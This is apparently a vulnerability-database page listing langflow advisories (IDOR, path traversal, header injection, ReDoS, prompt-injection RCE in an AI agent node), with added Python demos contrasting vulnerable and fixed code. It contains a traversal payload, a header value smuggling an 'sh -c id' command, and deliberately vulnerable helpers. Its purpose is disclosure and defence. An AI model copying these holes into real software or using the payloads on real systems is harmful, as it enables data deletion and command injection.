Lookup for vulnerable packages by Package URL.

Purl pkg:pypi/langflow@0.5.0a0
Type pypi
Namespace
Name langflow
Version 0.5.0a0
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 1.9.1
Latest_non_vulnerable_version 1.9.1
Affected_by_vulnerabilities
0
url VCID-1dek-kvzf-27d1
vulnerability_id VCID-1dek-kvzf-27d1
summary
Langflow: Authenticated Users Can Read, Modify, and Delete Any Flow via Missing Ownership Check
## Vulnerability

### IDOR in `GET/PATCH/DELETE /api/v1/flow/{flow_id}`

The `_read_flow` helper in `src/backend/base/langflow/api/v1/flows.py` branched on the `AUTO_LOGIN` setting to decide whether to filter by `user_id`. Only the `AUTO_LOGIN` branch added that filter; when `AUTO_LOGIN` was `False` (i.e., authentication was enabled) the query carried no ownership check at all and returned any flow matching the given UUID regardless of who owned it.

This allowed any authenticated user to:

- **Read** any other user's flow, including embedded plaintext API keys
- **Modify** the logic of another user's AI agents
- **Delete** flows belonging to other users

The vulnerability was introduced by the conditional logic that was meant to accommodate public/example flows (those with `user_id = NULL`) under auto-login mode, but inadvertently left the authenticated path without an ownership filter.

---

## Fix (PR #8956)

The fix removes the `AUTO_LOGIN` conditional entirely and unconditionally scopes the query to the requesting user:

```diff
-    auth_settings = settings_service.auth_settings
-    stmt = select(Flow).where(Flow.id == flow_id)
-    if auth_settings.AUTO_LOGIN:
-        stmt = stmt.where(
-            (Flow.user_id == user_id) | (Flow.user_id == None)  # noqa: E711
-        )
+    stmt = select(Flow).where(Flow.id == flow_id).where(Flow.user_id == user_id)
```
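Review bot: the replacement `where(Flow.user_id == user_id)` also drops the `(Flow.user_id == None)` disjunct, so flows with a NULL `user_id` (the public/example flows the removed branch existed for) become unreachable through `_read_flow` in AUTO_LOGIN mode as well as in authenticated mode. If those flows are still meant to be served, build the owner filter as `Flow.user_id == user_id` unconditionally and, only when `auth_settings.AUTO_LOGIN` is set, widen it to `(Flow.user_id == user_id) | (Flow.user_id == None)`; either way the advisory should say how such flows are handled after the change. Returning no row for a non-owned id is the right shape, since the caller cannot distinguish "not yours" from "does not exist".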

All three operations — read, update, and delete — route through `_read_flow`, so the single change covers the full attack surface. A cross-user isolation test (`test_read_flows_user_isolation`) was added to prevent regression.
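The following is an added example, not Langflow's own code: it reproduces the two query shapes above against a throwaway SQLite table so the cross-user isolation check can be run by hand. Plain `sqlite3` stands in for SQLModel, and the table layout, user ids and flow name are constructed for the example.

```python
import sqlite3
import uuid


def make_db() -> sqlite3.Connection:
    """Constructed fixture: a minimal 'flow' table with the columns the advisory mentions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flow (id TEXT PRIMARY KEY, name TEXT, user_id TEXT)")
    return conn


def read_flow_before_fix(conn: sqlite3.Connection, flow_id: str, user_id: str, auto_login: bool):
    """Mirrors the pre-fix branching: the user_id filter exists only on the AUTO_LOGIN branch,
    so with authentication enabled (auto_login=False) any flow id is returned to any caller."""
    sql = "SELECT id, name, user_id FROM flow WHERE id = ?"
    params = [flow_id]
    if auto_login:
        sql += " AND (user_id = ? OR user_id IS NULL)"
        params.append(user_id)
    return conn.execute(sql, params).fetchone()


def read_flow_after_fix(conn: sqlite3.Connection, flow_id: str, user_id: str):
    """Mirrors PR #8956: the query is always scoped to the requesting user."""
    sql = "SELECT id, name, user_id FROM flow WHERE id = ? AND user_id = ?"
    return conn.execute(sql, (flow_id, user_id)).fetchone()


def user_isolation_results() -> dict:
    """Cross-user isolation scenario: alice owns a flow, bob only knows its UUID.
    Every value is True when the helpers behave as the advisory describes."""
    conn = make_db()
    alice, bob, flow_id = (str(uuid.uuid4()) for _ in range(3))
    conn.execute("INSERT INTO flow VALUES (?, ?, ?)", (flow_id, "alice-agent", alice))
    return {
        # authenticated mode: bob reads alice's flow (the IDOR)
        "before_fix_auth_enabled_leaks": read_flow_before_fix(conn, flow_id, bob, auto_login=False) is not None,
        # auto-login mode: the old branch did filter, so the bug needed auth to be enabled
        "before_fix_auto_login_filters": read_flow_before_fix(conn, flow_id, bob, auto_login=True) is None,
        # after the fix: no row for a non-owner, the owner still gets the flow
        "after_fix_blocks_other_user": read_flow_after_fix(conn, flow_id, bob) is None,
        "after_fix_serves_owner": read_flow_after_fix(conn, flow_id, alice) is not None,
    }


if __name__ == "__main__":
    for check, ok in user_isolation_results().items():
        print(f"{check}: {ok}")
```

The second result is the one worth pausing on: the original code did scope the query under `AUTO_LOGIN`, which is why the advisory qualifies the bug with "authentication was enabled". A regression test that only exercises the auto-login configuration would have passed on the vulnerable code.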

---

## Acknowledgements

Langflow thanks the security researcher who responsibly disclosed this vulnerability:

- **[@chximn-dt](https://github.com/chximn-dt)**
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34046
reference_id
reference_type
scores
0
value 0.00052
scoring_system epss
scoring_elements 0.16672
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34046
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/pull/8956
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/
url https://github.com/langflow-ai/langflow/pull/8956
3
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:05Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-8c4j-f57c-35cf
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34046
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34046
5
reference_url https://github.com/advisories/GHSA-8c4j-f57c-35cf
reference_id GHSA-8c4j-f57c-35cf
reference_type
scores
url https://github.com/advisories/GHSA-8c4j-f57c-35cf
fixed_packages
0
url pkg:pypi/langflow@1.5.1
purl pkg:pypi/langflow@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-ysnc-jyxb-6qcy
15
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1
aliases CVE-2026-34046, GHSA-8c4j-f57c-35cf
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1dek-kvzf-27d1
1
url VCID-1ynd-c2hz-53hx
vulnerability_id VCID-1ynd-c2hz-53hx
summary
Langflow has Remote Code Execution in CSV Agent
The CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE).
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27966
reference_id
reference_type
scores
0
value 0.41016
scoring_system epss
scoring_elements 0.97466
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27966
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/
url https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27966
reference_id CVE-2026-27966
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27966
4
reference_url https://github.com/advisories/GHSA-3645-fxcv-hqr4
reference_id GHSA-3645-fxcv-hqr4
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3645-fxcv-hqr4
5
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4
reference_id GHSA-3645-fxcv-hqr4
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-27T14:15:24Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-3645-fxcv-hqr4
fixed_packages
aliases CVE-2026-27966, GHSA-3645-fxcv-hqr4
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1ynd-c2hz-53hx
2
url VCID-2195-gd33-xbdp
vulnerability_id VCID-2195-gd33-xbdp
summary
Langflow Knowledge Bases API is Vulnerable to Path Traversal
## Summary
Langflow is vulnerable to Path Traversal in the Knowledge Bases API (`DELETE /api/v1/knowledge_bases`). This occurs because user-supplied knowledge base names are concatenated directly into file paths without proper sanitization or boundary validation. An authenticated attacker can exploit this flaw to delete arbitrary directories anywhere on the server's filesystem, leading to data loss and potential service disruption.

## Details
The vulnerability exists in the `delete_knowledge_bases_bulk` function within `src/backend/base/langflow/api/v1/knowledge_bases.py`. 

This function constructs file paths directly from the user-supplied `kb_names` parameter. While other knowledge base endpoints safely route through standard path resolution (e.g., `_resolve_kb_path()`), the bulk delete handler bypasses this entirely. It builds the path manually and passes it directly to `shutil.rmtree()` without validating if the resulting path resolves outside the intended user directory.

## PoC (Proof of Concept)
For the **Bulk Delete** endpoint, an authenticated attacker can supply a traversal sequence in the `kb_names` parameter:
`../victim_user/kb_name`

Because the path is passed directly to `shutil.rmtree()` without containment checks, this payload deletes directories outside the intended scope.

## Impact
Any Langflow instance exposing this endpoint to authenticated users is vulnerable. This exposes the server to:
* **Cross-user data compromise:** Deletion of directories within another tenant's knowledge base space.
* **Arbitrary filesystem manipulation:** Directory deletion at any path on the server where the application has write permissions.
* **Service disruption & Data Loss:** Deletion of critical application files or unrecoverable data loss if backups are co-located on the same filesystem.

## Fixes
The issue was addressed in **PR #12243**, which applies `Path.resolve()` to normalize the supplied path and validates that it starts with the authenticated user's directory before deletion. Subsequent updates (backported from PR #12337) introduced robust containment checks using `Path.is_relative_to()` to prevent prefix-ambiguity bugs.

## Acknowledgements
Thanks to the security researchers who responsibly disclosed this vulnerability:
* @ddlxstudio
* @nekros1xx
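An added example (not Langflow's code) that walks through the three states the Details and Fixes sections describe: the unchecked `shutil.rmtree()` on a concatenated path, the first `Path.resolve()` + string-prefix check, and the `Path.is_relative_to()` containment that PR #12337 backported. The per-user directory layout, user names and the `docs` knowledge base are constructed for the example; `is_relative_to` needs Python 3.9 or later.

```python
import shutil
import tempfile
from pathlib import Path


def _kb_root(base: Path, user_id: str) -> Path:
    """Per-user knowledge-base directory (layout assumed for this example)."""
    return base / user_id


def _target_path(base: Path, user_id: str, kb_name: str) -> Path:
    """Pre-fix construction: the user-supplied name is joined straight onto the path."""
    return _kb_root(base, user_id) / kb_name


def contained_by_prefix(candidate: Path, root: Path) -> bool:
    """String-prefix containment (the first fix): stops ../ traversal but is prefix-ambiguous,
    because '/kb/alice' is a prefix of '/kb/alice_evil'."""
    return str(candidate.resolve()).startswith(str(root.resolve()))


def contained_by_relative_to(candidate: Path, root: Path) -> bool:
    """Component-wise containment (the backported fix): compares whole path segments."""
    return candidate.resolve().is_relative_to(root.resolve())


def delete_kb(base: Path, user_id: str, kb_name: str, check=None) -> bool:
    """Delete one knowledge base. `check` is the containment predicate; None reproduces the
    vulnerable handler. Returns True if a directory was removed, False if the check refused."""
    target = _target_path(base, user_id, kb_name)
    if check is not None and not check(target, _kb_root(base, user_id)):
        return False
    shutil.rmtree(target)
    return True


def run_scenarios() -> dict:
    """Constructed fixture: users alice, alice_evil and victim each own a KB called 'docs'.
    Every value is True when the handler behaves as the advisory describes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)

        def reset():
            for user in ("alice", "alice_evil", "victim"):
                (base / user / "docs").mkdir(parents=True, exist_ok=True)

        reset()
        # 1. No check: the advisory's payload shape removes another tenant's directory
        delete_kb(base, "alice", "../victim/docs", check=None)
        results["unchecked_deletes_victim"] = not (base / "victim" / "docs").exists()
        reset()
        # 2. The prefix check stops plain traversal out of the user's directory ...
        results["prefix_blocks_traversal"] = not delete_kb(base, "alice", "../victim/docs", contained_by_prefix)
        # 3. ... but a sibling whose name extends ours still passes the startswith test
        results["prefix_allows_sibling"] = delete_kb(base, "alice", "../alice_evil/docs", contained_by_prefix)
        reset()
        # 4. is_relative_to compares path components, so the sibling is refused ...
        results["relative_to_blocks_sibling"] = not delete_kb(base, "alice", "../alice_evil/docs", contained_by_relative_to)
        # 5. ... while a legitimate name inside the user's own directory still works
        results["relative_to_allows_own"] = delete_kb(base, "alice", "docs", contained_by_relative_to)
    return results


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name}: {ok}")
```

Scenario 3 is the "prefix-ambiguity bug" the Fixes section alludes to: `resolve()` removes the `..` segments, but a string comparison still treats `/kb/alice` as containing `/kb/alice_evil/docs`. Comparing path components, as `is_relative_to` does, is the check to keep; rejecting names that contain a separator or `..` before any path is built is a cheap additional layer.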
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42048
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03446
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42048
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:13:40Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42048
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42048
4
reference_url https://github.com/advisories/GHSA-9whx-c884-c68q
reference_id GHSA-9whx-c884-c68q
reference_type
scores
url https://github.com/advisories/GHSA-9whx-c884-c68q
fixed_packages
0
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-42048, GHSA-9whx-c884-c68q
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2195-gd33-xbdp
3
url VCID-2649-thqq-r3d2
vulnerability_id VCID-2649-thqq-r3d2
summary
Langflow vulnerable to injection
A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function get_client_ip/install_mcp_config of the file src/backend/base/langflow/api/v1/mcp_projects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument X-Forwarded-For results in injection. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
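The page does not say what `install_mcp_config` does with the `X-Forwarded-For` value, only that manipulating the header "results in injection". The following is an added example, not Langflow's code, showing the generic hardening for a `get_client_ip`-style helper: honour the header only when the TCP peer is a known proxy, walk the hop list from the right past trusted hops, and accept a hop only if it parses as an IP literal, so no free-form string ever reaches a config file or template. The proxy range and the injected payload are constructed for the example.

```python
import ipaddress

# Assumption for this example: reverse proxies sit in 10.0.0.0/8. The real deployment
# topology is not on the page; this list must match the proxies actually in front of the app.
TRUSTED_PROXY_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(ip) -> bool:
    return any(ip in net for net in TRUSTED_PROXY_NETS)


def get_client_ip_naive(headers: dict, peer: str) -> str:
    """Takes the first X-Forwarded-For hop verbatim: whatever the client sent becomes the 'IP'."""
    xff = headers.get("x-forwarded-for", "")
    return xff.split(",")[0].strip() if xff else peer


def get_client_ip_strict(headers: dict, peer: str) -> str:
    """Returns a validated IP literal. Falls back to the peer address whenever the header
    cannot be trusted, so the result is always safe to embed anywhere."""
    peer_ip = ipaddress.ip_address(peer)
    if not _is_trusted_proxy(peer_ip):
        return str(peer_ip)  # direct connection: the header is attacker-controlled, ignore it
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):  # right-most hop was appended by the proxy nearest to us
        try:
            hop_ip = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer_ip)  # any non-IP token poisons the whole header: discard it
        if not _is_trusted_proxy(hop_ip):
            return str(hop_ip)  # first untrusted hop from the right is the real client
    return str(peer_ip)


# Constructed payload: an IP followed by text a naive sink would splice into JSON/YAML.
INJECTED = '203.0.113.9"\n  "command": "sh -c id'


def scenarios() -> dict:
    """Every value is True when the naive helper passes the payload and the strict one does not."""
    via_proxy = {"x-forwarded-for": "198.51.100.7, 10.0.0.5"}
    hostile = {"x-forwarded-for": INJECTED}
    spoofed_direct = {"x-forwarded-for": "127.0.0.1"}
    return {
        "naive_passes_injection": get_client_ip_naive(hostile, "10.0.0.1") == INJECTED,
        "strict_rejects_injection": get_client_ip_strict(hostile, "10.0.0.1") == "10.0.0.1",
        "strict_finds_real_client": get_client_ip_strict(via_proxy, "10.0.0.1") == "198.51.100.7",
        "strict_ignores_spoof_from_direct_client": get_client_ip_strict(spoofed_direct, "198.51.100.7") == "198.51.100.7",
    }


if __name__ == "__main__":
    for name, ok in scenarios().items():
        print(f"{name}: {ok}")
```

Validating the value as an IP literal is what removes the injection surface; it is independent of, and should be combined with, proper escaping at whatever sink consumes the address.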
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6599
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.16853
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6599
1
reference_url https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://gist.github.com/chenhouser2025/a909c47316b7a0948ee68c109ab747a3
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6599
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6599
4
reference_url https://vuldb.com/submit/791922
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/submit/791922
5
reference_url https://vuldb.com/vuln/358234
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/vuln/358234
6
reference_url https://vuldb.com/vuln/358234/cti
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:P/A:P/E:POC/RL:W/RC:UR
1
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
2
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
3
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:W/RC:R
4
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
5
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T14:24:29Z/
url https://vuldb.com/vuln/358234/cti
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
8
reference_url https://github.com/advisories/GHSA-v66p-f7x3-4794
reference_id GHSA-v66p-f7x3-4794
reference_type
scores
url https://github.com/advisories/GHSA-v66p-f7x3-4794
fixed_packages
0
url pkg:pypi/langflow@1.8.4
purl pkg:pypi/langflow@1.8.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2195-gd33-xbdp
1
vulnerability VCID-4swq-hbjm-3ucd
2
vulnerability VCID-q4r1-xjfk-7bg9
3
vulnerability VCID-rrva-95s5-kbcf
4
vulnerability VCID-v5pc-pdm9-97g8
5
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4
aliases CVE-2026-6599, GHSA-v66p-f7x3-4794
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2649-thqq-r3d2
4
url VCID-9k4q-zwxf-euh1
vulnerability_id VCID-9k4q-zwxf-euh1
summary
Inefficient Regular Expression Complexity in langflow
A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-9277
reference_id
reference_type
scores
0
value 0.0017
scoring_system epss
scoring_elements 0.38017
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-9277
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
